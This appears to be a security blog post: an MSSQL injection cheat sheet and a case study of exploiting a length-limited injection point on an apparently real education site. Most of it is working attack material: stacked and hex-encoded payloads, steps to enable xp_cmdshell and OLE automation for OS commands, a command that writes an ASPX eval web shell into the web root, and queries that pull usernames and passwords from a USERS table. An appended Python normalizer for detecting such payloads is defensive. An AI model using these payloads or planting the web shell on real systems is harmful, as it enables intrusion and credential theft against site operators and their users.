Young people shouldn't always stay up late

MSSQL injection cheat sheet

Posted by jax777

References: https://xz.aliyun.com/t/248 ; Wooyun Drops "MSSQL Injection Knowledge Base v1.0", https://github.com/SuperKieran/WooyunDrops

This is a cheat sheet of MSSQL injection statements.

Common MSSQL statements

  • Current database: `db_name()`

  • Current user: `User_Name()`

  • List databases: `SELECT top 1 Name FROM Master..SysDatabases where name not in ('master')`

  • List tables: `select top 1 name from my_db_name.sys.all_objects where type='U' AND is_ms_shipped=0`

  • List columns (the second form excludes the columns already retrieved, here `ID`, so that the next one is returned):
    `select top 1 CAST(COLUMN_NAME AS NVARCHAR(4000)) from my_db_name.information_schema.columns where TABLE_NAME='my_table_name'`
    `select top 1 CAST(COLUMN_NAME AS NVARCHAR(4000)) from my_db_name.information_schema.columns where TABLE_NAME='my_table_name' and COLUMN_NAME not in('ID')`

  • Fetch data: `select top 1 CAST(my_column_name AS NVARCHAR(4000)) from my_db_name..my_table_name`

  • Row count of a table: `SELECT (CHAR(113)+(SELECT ISNULL(CAST(COUNT(*) AS NVARCHAR(4000)),CHAR(32)) FROM my_db_name.dbo.my_table_name))`

  • Column count of a table: `select CHAR(113)+(SELECT ISNULL(CAST(COUNT(*) AS NVARCHAR(4000)),CHAR(32)) FROM my_db_name..syscolumns,my_db_name..sysobjects WHERE my_db_name..syscolumns.id=my_db_name..sysobjects.id AND my_db_name..sysobjects.name='my_table_name')`

  • Hex encoding: the statement `select convert(int,@@version)` is passed as a hex literal and executed through a variable, with mixed-case keywords:
    `xxxx'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)--`

  • xp_cmdshell: check whether it is present with `SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell'`, then call it:
    `1';exec master..xp_cmdshell 'echo "<%@ LANGUAGE=Jscript %>;<%eval(Request("sb"),"unsafe")%>''" >C:\inetpub\wwwroot\congf1g.aspx' --`

Getting an OS shell from MSSQL

XP_CMDSHELL

  • Execute: `exec master..xp_cmdshell "whoami"`

  • Enable xp_cmdshell: `EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;` Disabling works the same way; just change the latter `1` (in the `xp_cmdshell` statement) to `0`.

  • If xp_cmdshell has been dropped, try to restore it by uploading xplog70.dll and re-registering the procedure: `Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'`

SP_OACREATE

When xp_cmdshell has been removed, SP_OACreate can be used instead.

  • Enable the component: `EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;`

  • Execute (this method returns no output): `declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >d:\\temp\\1.txt'`

Running into an injection point with a length limit when fetching column names

sqlmap output for the injection point:

```text
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: KeyWord (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: KeyWord=' AND 4938 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4938=4938) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)))-- limB

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: KeyWord=' AND 7003=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- HPLB
```

Table names could be retrieved, but not the actual column names.

  • sqlmap's column-enumeration statement:

```sql
' AND 9249 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM edu_xxxxx..syscolumns,edu_xxxxx..sysobjects WHERE edu_xxxxx..syscolumns.id=edu_xxxxx..sysobjects.id AND edu_xxxxx..sysobjects.name=CHAR(85)+CHAR(83)+CHAR(69)+CHAR(82)+CHAR(83) AND ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 0 ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32)) FROM edu_xxxxx..syscolumns,edu_xxxxx..sysobjects WHERE edu_xxxxx..syscolumns.id=edu_xxxxx..sysobjects.id AND edu_xxxxx..sysobjects.name=CHAR(85)+CHAR(83)+CHAR(69)+CHAR(82)+CHAR(83) ORDER BY edu_xxxxx..syscolumns.name) ORDER BY edu_xxxxx..syscolumns.name)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)))-- vFJB
```

The page's error message showed the test statement being truncated: this injection point has a length limit. Probe that exceeds the limit:

```sql
' AND 4938 IN (SELECT '12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901')--
```

The limit turned out to be 487 characters. Probe that fits exactly:

```sql
' AND 4938 IN (SELECT '1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890')--
```

## sqlmap had already recovered the database name edu_xxxxx and the table name USERS

  • sqlmap column enumeration

    The statement is too long for the limit, so no column names come back:

    ```sql
    ' AND 4664 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM edu_xxxxx..syscolumns,edu_xxxxx..sysobjects WHERE edu_xxxxx..syscolumns.id=edu_xxxxx..sysobjects.id AND edu_xxxxx..sysobjects.name=CHAR(85)+CHAR(83)+CHAR(69)+CHAR(82)+CHAR(83) AND ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 0 ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32)) FROM edu_xxxxx..syscolumns,edu_xxxxx..sysobjects WHERE edu_xxxxx..syscolumns.id=edu_xxxxx..sysobjects.id AND edu_xxxxx..sysobjects.name=CHAR(85)+CHAR(83)+CHAR(69)+CHAR(82)+CHAR(83) ORDER BY edu_xxxxx..syscolumns.name) ORDER BY edu_xxxxx..syscolumns.name)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)))-- gjtG
    ```

  • Hand-written shorter query that does retrieve the column names (the second form excludes the columns already found so the next one is returned):

    ```sql
    ' AND 4938 IN (select top 1 COLUMN_NAME from edu_xxxxx.information_schema.columns where TABLE_NAME='USERS')--
    ' AND 4938 IN (select top 1 COLUMN_NAME from edu_xxxxx.information_schema.columns where TABLE_NAME='USERS' and COLUMN_NAME not in('USER_STATUS','LAST_LOGIN_TIME','USER_GROUP_ID','USER_ID','USER_NM','USER_TYPE','USER_NAME','USER_PWD','USER_PWD_QUT','USER_PWD_ANS','USER_BRI_DATE','USER_SEX','USER_TEL','USER_EMAIL','USER_INTRODUCE','USER_IP','USER_PROXY_IP','REMARK','USER_BUSINESS_NM','OTHER_ID','LOGIN_TIMES','zz_sf','zj','user_worktime'))--
    ```

  • Retrieving data

    • By hand:

      ```sql
      'AND 4938 IN (select top 1 USER_PWD from edu_xxxxx..USERS)--
      'AND 4938 IN (select top 1 USER_NAME from edu_xxxxx..USERS)--
      ```

    • Once the column names are known, sqlmap's statements are shorter than the limit, so sqlmap can be used directly. sqlmap statement:

      ```sql
      ' AND 8120 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(USER_NAME) AS NVARCHAR(4000)),CHAR(32)) FROM (SELECT USER_NAME, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM edu_xxxxx.dbo.USERS)x WHERE LIMIT=2)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)))-- XSwE
      ```
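From the defensive side, the encodings this post relies on (the `0x...` literal run through `eXeC(@s)` in the cheat sheet, and the `CHAR(n)+CHAR(n)` chains and `sysusers` heavy query in the sqlmap payloads of the case study) are exactly what a request filter or log review has to undo before any keyword match works. The following is an added example, not code from the original post: a normalizer plus indicator check over constructed parameter values modelled on the page's payloads; the indicator list and sample strings are my own choices.

```python
import re
from typing import List

# Constructed sample parameter values modelled on the payloads in this post (not real traffic).
SAMPLES = {
    "hex": "1'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)--",
    "char": "' AND 4938 IN (SELECT (CHAR(113)+CHAR(98)+(SELECT (CASE WHEN (4938=4938) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)))-- limB",
    "heavy": "' AND 7003=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3)-- HPLB",
    "benign": "school admission 2019",
}

# MSSQL-specific names used throughout the post that a search keyword has no business containing.
INDICATORS = (
    "xp_cmdshell", "sp_oacreate", "sp_oamethod", "sp_configure", "sp_addextendedproc",
    "information_schema.columns", "..syscolumns", "..sysobjects", "sysdatabases",
    "@@version", "case when", "exec(",
)
# sqlmap's time-based "heavy query": a self-join of sysusers.
HEAVY_QUERY = re.compile(r"from\s+sysusers\s+as\s+sys1\s*,\s*sysusers\s+as\s+sys2", re.I)
HEX_LITERAL = re.compile(r"0x([0-9a-f]+)", re.I)
CHAR_CHAIN = re.compile(r"(?:char\(\d+\)\s*\+\s*)*char\(\d+\)", re.I)
CHAR_ONE = re.compile(r"char\((\d+)\)", re.I)

def normalize(payload: str) -> str:
    """Undo the two encodings the post uses: 0x.. literals become ASCII text, CHAR(n)+CHAR(n)
    chains become a quoted string; whitespace is collapsed and case folded (defeats dEcLaRe/eXeC)."""
    def hex_to_text(m):
        try:
            return bytes.fromhex(m.group(1)).decode("ascii")
        except ValueError:  # odd length or non-ASCII bytes: leave the literal untouched
            return m.group(0)
    def chars_to_text(m):
        return "'" + "".join(chr(int(c)) for c in CHAR_ONE.findall(m.group(0))) + "'"
    text = HEX_LITERAL.sub(hex_to_text, payload)
    text = CHAR_CHAIN.sub(chars_to_text, text)
    return re.sub(r"\s+", " ", text).lower()

def flag(payload: str) -> List[str]:
    """Return the indicators present in the normalized payload; an empty list means nothing matched."""
    text = normalize(payload)
    hits = [name for name in INDICATORS if name in text]
    if HEAVY_QUERY.search(text):
        hits.append("sysusers heavy query")
    return hits

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:7s} {flag(value)}")
```

The hex sample normalizes to `... set @s=select convert(int,@@version) exec(@s)--`, which is why plain substring rules only become useful after decoding.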